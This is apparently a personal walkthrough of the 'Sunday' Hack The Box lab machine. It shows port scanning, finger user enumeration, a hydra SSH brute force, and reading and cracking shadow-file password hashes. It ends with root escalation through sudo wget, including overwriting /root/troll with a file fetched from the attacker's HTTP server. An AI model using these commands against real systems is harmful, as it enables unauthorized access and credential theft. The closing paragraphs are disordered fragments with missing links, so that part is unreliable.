When i connect to a machine i usally use nmap to scan but for just learning new tools i will use to scan all ports then use nmap to scan the version and use scripts
$ rustscan 10.10.10.76 --no-nmap
Open 10.10.10.76:79
Open 10.10.10.76:111
Open 10.10.10.76:515
Open 10.10.10.76:6787
Open 10.10.10.76:22022
10.10.10.76 -> [79,111,515,6787,22022]
$ nmap -sC -sV -p 79,111,515,6787,22022 -oA portscan.txt 10.10.10.76
PORT STATE SERVICE VERSION
79/tcp open finger?
|_finger: No one logged on\x0D
| fingerprint-strings:
| GenericLines:
| No one logged on
| GetRequest:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| HTTPOptions:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| OPTIONS ???
| Help:
| Login Name TTY Idle When Where
| HELP ???
| RTSPRequest:
| Login Name TTY Idle When Where
| OPTIONS ???
| RTSP/1.0 ???
| SSLSessionReq, TerminalServerCookie:
|_ Login Name TTY Idle When Where
111/tcp open rpcbind 2-4 (RPC #100000)
515/tcp open printer
6787/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: 400 Bad Request
22022/tcp open ssh OpenSSH 8.4 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:00:94:32:18:60:a4:93:3b:87:a4:b6:f8:02:68:0e (RSA)
|_ 256 da:2a:6c:fa:6b:b1:ea:16:1d:a6:54:a1:0b:2b:ee:48 (ED25519)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port79-TCP:V=7.94SVN%I=7%D=10/14%Time=670D1AC0%P=x86_64-pc-linux-gnu%r(
SF:GenericLines,12,"No\x20one\x20logged\x20on\r\n")%r(GetRequest,93,"Login
...snip..
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n");
Finger 79/tcp
$ wget https://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz
$ tar -xzf finger-user-enum-1.0.tar.gz && cd finger-user-enum-1.0
# we need list of users to brute force
# i will use this https://github.com/danielmiessler/SecLists/blob/master/Usernames/Names/names.txt
$ ./finger-user-enum.pl -U /usr/share/wordlists/seclists/Usernames/Names/names.txt -t 10.10.10.76
access@10.10.10.76: access No Access User < . . . . >..nobody4 SunOS 4.x NFS Anonym < . . . . >..
admin@10.10.10.76: Login Name TTY Idle When Where..adm Admin < . . . . >..dladm Datalink Admin < . . . . >..netadm Network Admin < . . . . >..netcfg Network Configuratio < . . . . >..dhcpserv DHCP Configuration A < . . . . >..ikeuser IKE Admin < . . . . >..lp Line Printer Admin < . . . . >..
anne marie@10.10.10.76: Login Name TTY Idle When Where..anne ???..marie ???..
bin@10.10.10.76: bin ??? < . . . . >..
dee dee@10.10.10.76: Login Name TTY Idle When Where..dee ???..dee ???..
ike@10.10.10.76: ikeuser IKE Admin < . . . . >..
jo ann@10.10.10.76: Login Name TTY Idle When Where..ann ???..jo ???..
la verne@10.10.10.76: Login Name TTY Idle When Where..la ???..verne ???..
line@10.10.10.76: Login Name TTY Idle When Where..lp Line Printer Admin < . . . . >..
message@10.10.10.76: Login Name TTY Idle When Where..smmsp SendMail Message Sub < . . . . >..
miof mela@10.10.10.76: Login Name TTY Idle When Where..mela ???..miof ???..
root@10.10.10.76: root Super-User ssh <Dec 7, 2023> 10.10.14.46 ..
sammy@10.10.10.76: sammy ??? ssh <Apr 13, 2022> 10.10.14.13 ..
sunny@10.10.10.76: sunny ??? ssh <Apr 13, 2022> 10.10.14.13 ..
sys@10.10.10.76: sys ??? < . . . . >..
zsa zsa@10.10.10.76: Login Name TTY Idle When Where..zsa ???..zsa ???..
SSH 22022/tcp
we get 3 users logged in with ssh : root,sammy and sunny so now we will try to brute force ssh
we couldn't brute force root and sammy but we got sunny:sunday
$ hydra -s 22022 -t 64 -l sunny -P /usr/share/wordlists/seclists/Passwords/probable-v2-top1575.txt 10.10.10.76 ssh
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-10-14 10:24:32
[DATA] max 64 tasks per 1 server, overall 64 tasks, 1575 login tries (l:1/p:1575), ~25 tries per task
[DATA] attacking ssh://10.10.10.76:22022/
[STATUS] 434.00 tries/min, 434 tries in 00:01h, 1168 to do in 00:03h, 37 active
[22022][ssh] host: 10.10.10.76 login: sunny password: sunday
1 of 1 target successfully completed, 1 valid password found
now we logged in as sunny and we don't see user.txt as the user flag that means there are other users we need to search for
# ssh sunny@sunday.htb -p 22022
$ cat /etc/passwd | grep bash
root:x:0:0:Super-User:/root:/usr/bin/bash
openldap:x:75:75:OpenLDAP User:/:/usr/bin/pfbash
sammy:x:100:10::/home/sammy:/usr/bin/bash
sunny:x:101:10::/home/sunny:/usr/bin/bash
# so we need to get sammy's password
Let's keep searching the machine for any odd files we get .bash_history and there are commands run
su -
sudo -l
sudo /root/troll
ls /backup
ls -l /backup
cat /backup/shadow.backup
# lets see what sudo -l gives sunny
User sunny may run the following commands on sunday:
(root) NOPASSWD: /root/troll
$ sudo /root/troll
testing
uid=0(root) gid=0(root)
# we see it is printing testing and then id as root
# we can't edit it or even see what is this even after research what is this
# so we will keep continue to look at backup
/backup$ ls -la
-rw-r--r-- 1 root root 319 Dec 19 2021 agent22.backup
-rw-r--r-- 1 root root 319 Dec 19 2021 shadow.backup
#agent22.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
#shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
# they are identical
we have that hash and to know which encryption algorithm is used we have to look at $id
$1$ is MD5 | $2a$ is Blowfish | $2y$ is Blowfish | $5$ is SHA-256 | $6$ is SHA-512 | $y$ is yescrypt
For privilege escalation we can see many ways to it and i will try to write about all
#1 Sudo all
$ sudo -l
User sammy may run the following commands on sunday:
(ALL) ALL
(root) NOPASSWD: /usr/bin/wget
# if we can run all that means we can get root bash
$ sudo /bin/bash
root@sunday:/home/sammy# wc /root/root.txt
1 1 33 /root/root.txt
#2 wget
# For fast win we can read /root/root.txt (flag)
$ sudo wget -i /root/root.txt
--2024-10-14 15:51:22-- http://456efbda87744c9fe91f7358645a8c08/
# and the flag between / /
# we can read /etc/shadow file then crack root password
$ sudo wget -i /etc/shadow
--2024-10-14 15:41:18-- ftp://root/$5$rounds=10000$fIoXFZ5A$k7PlwsiH0wAyVOcKaAYl/Mo1Iq6XYfJlFXs58aA4Sr3:18969::::::23997553
=> ‘Mo1Iq6XYfJlFXs58aA4Sr3:18969::::::23997553’
# $5$rounds=10000$fIoXFZ5A$k7PlwsiH0wAyVOcKaAYl/Mo1Iq6XYfJlFXs58aA4Sr3 is the hash of root
########
# we can download files with wget
# so what if we can do that to /root/troll to edit it and get a shell to sunny
# and i think that was the goal for the box
# make a file named "troll" then python file transfer server
# python3 -m http.server 8000
# we need to setup our terminals like this and do sammy's command then fast sunday
sammy$ sudo wget -i http://10.10.16.8:8000/troll -O /root/troll
sunny$ sudo /root/troll
# and we would get a root shell on sunny's terminal
we can read 4 files
root.txt : flag
troll : the file that sunny can run as root
troll.original : a backup file of troll
overwrite : a script that runs every 5 seconds and changes troll file back to troll.original
Finger is an older protocol which displays information about users on a machine. This can be abused to verify if a user is valid on that machine. The protocol itself was designed in the 1970s, and is run in cleartext. () ()
So now we need to gather information about users on the machine, to do this we can use metasploit (auxiliary/scanner/finger/finger_users) but i will use
now we know it is SHA-256 , we will use hashcat
to get the mode of hashcat we look at their , but when we search for SHA-256 we don't get a hash like what we have so we search with $5$ we get " sha256crypt $5$, SHA256 (Unix) 2 " and mode 7400
For a faster result use it on your baremetal os , since i have windows i used on windows and it didn't take a second to crack [ | ]
when we see binaries that we can run as root we look at and see what can we do with it
